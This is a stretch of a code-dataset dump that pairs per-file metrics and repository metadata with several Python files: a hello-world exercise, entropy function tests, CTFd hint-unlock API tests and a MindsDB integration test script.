| 0.026913
| 0
| 0.764007
| 0
| 0
| 0.084234
| 0.00106
| 0
| 0
| 0
| 0
| 0.001698
| 1
| 0.027165
| false
| 0
| 0.018676
| 0.001698
| 0.103565
| 0.071307
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37dffbe983de890f78aaa6dfb1e5607c4a6fd623
| 49
|
py
|
Python
|
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | null | null | null |
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | 19
|
2019-07-20T23:29:27.000Z
|
2022-01-19T21:38:49.000Z
|
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | null | null | null |
def hello():
return 'Hello, World!'
pass
| 12.25
| 26
| 0.571429
| 6
| 49
| 4.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 49
| 3
| 27
| 16.333333
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.265306
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
72890f72f42bf1f0ef57d830423fe9b03e4412e5
| 6,624
|
py
|
Python
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 3
|
2021-05-19T11:44:30.000Z
|
2022-03-30T07:13:49.000Z
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 2
|
2021-06-02T01:24:59.000Z
|
2021-06-02T12:20:31.000Z
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 1
|
2021-10-14T13:21:27.000Z
|
2021-10-14T13:21:27.000Z
|
import numpy as np
import numpy.testing as npt
import pytest
from quara.math import entropy
def test_round_varz():
# success
actual = entropy.round_varz(0.1, 0.0)
expected = 0.1
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(np.float64(0.1), np.float64(0.0))
expected = 0.1
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(0.5, 0.8)
expected = 0.8
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(np.float64(0.5), np.float64(0.8))
expected = 0.8
npt.assert_almost_equal(actual, expected, decimal=15)
# raise ValueError
with pytest.raises(ValueError):
entropy.round_varz(-0.1, 0.0)
with pytest.raises(ValueError):
entropy.round_varz(0.5, -0.8)
with pytest.raises(ValueError):
entropy.round_varz(0.5, 0.8j)
def test_relative_entropy():
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p)
expected = 2 ** 4 * np.log(2) + 3 ** 2 * np.log(3)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_q=8.5)
expected = 3 ** 2 * np.log(3)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_p=4)
expected = 2 ** 3 * np.log(4) + 3 ** 2 * np.log(4)
npt.assert_almost_equal(actual, expected, decimal=15)
# q/p < eps_p
q = np.array([2 ** 3, 3], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_p=2)
expected = 2 ** 3 * np.log(4) + 3 * np.log(2)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([-2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p)
# eps_p is negative
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p, eps_p=-1)
# eps_q is negative
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p, eps_q=-1)
def test_gradient_relative_entropy_2nd():
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p)
expected = np.array([-22, -32], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_q=1.5)
expected = np.array([-18, -24], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_p=4)
expected = np.array([-21, -30], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([1, 2], dtype=np.float64)
p = np.array([-3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
with pytest.raises(ValueError):
entropy.gradient_relative_entropy_2nd(q, p, grad_p)
# eps_p is negative
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
with pytest.raises(ValueError):
entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_p=-1)
def test_hessian_relative_entropy_2nd():
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p)
expected = np.array([[144, 204], [194, 288]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_q=1.5)
expected = np.array([[132, 180], [174, 240]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_p=4)
expected = np.array([[138, 192], [183, 264]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, -4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
with pytest.raises(ValueError):
entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p)
# eps_p is negative
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
with pytest.raises(ValueError):
entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_p=-1)
| 36.8
| 82
| 0.616244
| 1,082
| 6,624
| 3.64695
| 0.071165
| 0.145971
| 0.212874
| 0.064622
| 0.92448
| 0.918905
| 0.918905
| 0.89559
| 0.87557
| 0.860365
| 0
| 0.100019
| 0.204559
| 6,624
| 179
| 83
| 37.005587
| 0.64889
| 0.034873
| 0
| 0.619403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104478
| 1
| 0.029851
| false
| 0
| 0.029851
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d4e1616dcc0320bba247172029d914a2862f37
| 121
|
py
|
Python
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 12
|
2020-12-13T15:48:15.000Z
|
2022-03-20T14:12:25.000Z
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 5
|
2020-11-01T15:42:06.000Z
|
2021-12-22T17:24:04.000Z
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 7
|
2020-12-27T09:28:31.000Z
|
2021-11-03T03:52:54.000Z
|
from .detection_utils import collate_fn
from .detection_utils import visualize_boxes_and_labels_on_image_array, load_obj
| 40.333333
| 80
| 0.900826
| 19
| 121
| 5.210526
| 0.789474
| 0.262626
| 0.363636
| 0.484848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 121
| 2
| 81
| 60.5
| 0.883929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72ff1c1dffef54064ad9e0fac00995f5dc6f72ee
| 8,833
|
py
|
Python
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 7
|
2019-10-10T10:06:38.000Z
|
2021-02-13T05:07:34.000Z
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 55
|
2020-08-05T08:23:50.000Z
|
2021-07-27T06:20:09.000Z
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 13
|
2020-05-08T18:52:54.000Z
|
2022-01-02T11:19:07.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from CTFd.models import db, Unlocks, Users
from CTFd.utils import set_config, text_type
from tests.helpers import (
create_ctfd,
destroy_ctfd,
register_user,
login_as_user,
gen_challenge,
gen_award,
gen_flag,
gen_hint,
)
from freezegun import freeze_time
def test_user_cannot_unlock_hint():
"""Test that a user can't unlock a hint if they don't have enough points"""
app = create_ctfd()
with app.app_context():
with app.test_client():
register_user(app, name="user1", email="user1@ctfd.io")
chal = gen_challenge(app.db, value=100)
chal_id = chal.id
gen_flag(app.db, challenge_id=chal.id, content="flag")
hint = gen_hint(db, chal_id, cost=10)
hint_id = hint.id
client = login_as_user(app, name="user1", password="password")
with client.session_transaction():
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") is None
assert resp["data"].get("cost") == 10
destroy_ctfd(app)
def test_user_can_unlock_hint():
"""Test that a user can unlock a hint if they have enough points"""
app = create_ctfd()
with app.app_context():
with app.test_client():
register_user(app, name="user1", email="user1@ctfd.io")
chal = gen_challenge(app.db, value=100)
chal_id = chal.id
gen_flag(app.db, challenge_id=chal.id, content="flag")
hint = gen_hint(app.db, chal_id, cost=10)
hint_id = hint.id
gen_award(app.db, user_id=2, value=15)
client = login_as_user(app, name="user1", password="password")
user = Users.query.filter_by(name="user1").first()
assert user.score == 15
with client.session_transaction():
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") is None
params = {"target": hint_id, "type": "hints"}
r = client.post("/api/v1/unlocks", json=params)
resp = r.get_json()
assert resp["success"] is True
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") == "This is a hint"
user = Users.query.filter_by(name="user1").first()
assert user.score == 5
destroy_ctfd(app)
def test_unlocking_hints_with_no_cost():
"""Test that hints with no cost can be unlocked"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ctf_with_points():
"""Test that hints with a cost are unlocked if you have the points"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") == "This is a hint"
user = Users.query.filter_by(id=2).first()
assert user.score == 90
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ctf_without_points():
"""Test that hints with a cost are not unlocked if you don't have the points"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert (
r.get_json()["errors"]["score"]
== "You do not have enough points to unlock this hint"
)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
user = Users.query.filter_by(id=2).first()
assert user.score == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_before_ctf():
"""Test that hints are not unlocked if the CTF hasn't begun"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id)
gen_award(app.db, user_id=2)
set_config(
"start", "1507089600"
) # Wednesday, October 4, 2017 12:00:00 AM GMT-04:00 DST
set_config(
"end", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-10-1"):
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.status_code == 403
assert r.get_json().get("data") is None
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 403
assert r.get_json().get("data") is None
r = client.get("/api/v1/hints/1")
assert r.get_json().get("data") is None
assert r.status_code == 403
user = Users.query.filter_by(id=2).first()
assert user.score == 100
assert Unlocks.query.count() == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ended_ctf():
"""Test that hints with a cost are not unlocked if the CTF has ended"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
set_config(
"start", "1507089600"
) # Wednesday, October 4, 2017 12:00:00 AM GMT-04:00 DST
set_config(
"end", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-11-4"):
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json().get("data") is None
assert r.status_code == 403
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 403
assert r.get_json()
r = client.get("/api/v1/hints/1")
assert r.status_code == 403
user = Users.query.filter_by(id=2).first()
assert user.score == 100
assert Unlocks.query.count() == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_frozen_ctf():
"""Test that hints with a cost are unlocked if the CTF is frozen."""
app = create_ctfd()
with app.app_context():
set_config(
"freeze", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-10-4"):
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
with freeze_time("2017-10-8"):
client = login_as_user(app)
client.get("/api/v1/hints/1")
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
r = client.get("/api/v1/hints/1")
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
user = Users.query.filter_by(id=2).first()
assert user.score == 100
destroy_ctfd(app)
def test_unlocking_hint_for_unicode_challenge():
"""Test that hints for challenges with unicode names can be unlocked"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db, name=text_type("🐺"))
chal_id = chal.id
gen_hint(app.db, chal_id)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
destroy_ctfd(app)
| 32.003623
| 83
| 0.574437
| 1,245
| 8,833
| 3.898795
| 0.114859
| 0.035847
| 0.028018
| 0.043263
| 0.874536
| 0.854965
| 0.834363
| 0.811908
| 0.795426
| 0.751751
| 0
| 0.043103
| 0.290841
| 8,833
| 275
| 84
| 32.12
| 0.731641
| 0.097928
| 0
| 0.733668
| 0
| 0
| 0.109651
| 0
| 0
| 0
| 0
| 0
| 0.170854
| 1
| 0.045226
| false
| 0.01005
| 0.020101
| 0
| 0.065327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4016e3c852969867120617a8aaf201456e33c12
| 14,090
|
py
|
Python
|
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | null | null | null |
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | null | null | null |
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | 1
|
2019-10-06T20:14:59.000Z
|
2019-10-06T20:14:59.000Z
|
from data_generators import *
import traceback
import sys
import os
import itertools
import logging
from colorlog import ColoredFormatter
import time
import mindsdb
from mindsdb import CONST
types_that_fail = ['str']
types_that_work = ['int','float','date','datetime','timestamp','ascii']
logger = None
def setup_testing_logger():
global logger
formatter = ColoredFormatter(
"%(log_color)s%(message)s",
datefmt=None,
reset=True,
log_colors={
'DEBUG': 'black,bg_white',
'INFO': 'blue,bg_white',
'WARNING': 'orange,bg_white',
'ERROR': 'red,bg_white',
'CRITICAL': 'red,bg_white',
}
)
logger = logging.getLogger('mindsdb_integration_testing')
logger.handlers = []
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def test_timeseries():
logger.info('Starting timeseries test !')
ts_hours = 12
separator = ','
data_len = 1200
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
# Create the full dataset
logger.debug(f'Creating timeseries test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
# add ,'ascii' in the features list to re-implement the group by
features = generate_value_cols(['date','int'],data_len, separator, ts_hours * 3600)
#features[3] = list(map(lambda x: str(x[0]) if len(x) > 0 else 'Nrmm', features[3]))
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
logger.debug(f'Datasets generate and saved to files successfully')
except:
print(traceback.format_exc())
logger.error(f'Failed to generate datasets !')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_date_timeseries_2')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(
from_data=train_file_name,
to_predict=label_headers
# timeseries specific argsw
,order_by=feature_headers[0]
#,window_size_seconds=ts_hours* 3600 * 1.5
,window_size=3
#,group_by = feature_headers[3]
,use_gpu=False
,backend='lightwood'
)
logger.info(f'--------------- Learning ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed during the training !')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_date_timeseries_2')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name,use_gpu=False)
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
models = mdb.get_models()
print(models)
mdb.get_model_data(models[0]['name'])
logger.info(f'--------------- Predicting ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
logger.info('Timeseries test ran succesfully !')
def test_one_label_prediction():
logger.info('Starting one-label test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 8000
# Create the full dataset
logger.debug(f'Creating one-labe test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','nr_category'],data_len, separator)
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
logger.debug(f'Datasets generate and saved to files successfully')
except:
print(traceback.format_exc())
logger.error(f'Failed to generate datasets !')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
logger.info(f'--------------- Learning ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed during the training !')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
logger.info(f'--------------- Predicting ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
logger.info('One-label prediction test ran succesfully !')
def test_one_label_prediction_wo_strings():
logger.info('Starting one-label test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 8000
# Create the full dataset
logger.debug(f'Creating one-labe test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','datetime','date','int'],data_len, separator)
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
logger.debug(f'Datasets generate and saved to files successfully')
except:
print(traceback.format_exc())
logger.error(f'Failed to generate datasets !')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction_wo_strings')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
logger.info(f'--------------- Learning ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed during the training !')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction_wo_strings')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
logger.info(f'--------------- Predicting ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
logger.info('One-label prediction test ran succesfully !')
def test_multilabel_prediction():
logger.info('Starting multilabel prediction test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 600
# Create the full dataset
logger.debug(f'Creating multilabel test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','int','float'], data_len, separator)
labels = []
labels.append(generate_labels_3(features, separator))
labels.append(generate_labels_2(features, separator))
labels.append(generate_labels_1(features, separator))
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
logger.debug(f'Multilabel datasets generate and saved to files successfully')
except:
print(traceback.format_exc())
logger.error(f'Failed to generate datasets !')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_multilabel_prediction')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
logger.info(f'--------------- Learning ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed during the training !')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_multilabel_prediction')
logger.debug(f'Succesfully create mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
for i in range(len(results)):
row = results[i]
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
print(row[col])
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
logger.info(f'--------------- Predicting ran succesfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
logger.info('Multilabel predict test ran succesfully !')
separator = ','
data_file_name = 'test_data.csv'
data_len = 10000
setup_testing_logger()
if __name__ == '__main__':
test_timeseries()
test_one_label_prediction_wo_strings()
test_multilabel_prediction()
test_one_label_prediction()
| 36.314433
| 156
| 0.632789
| 1,776
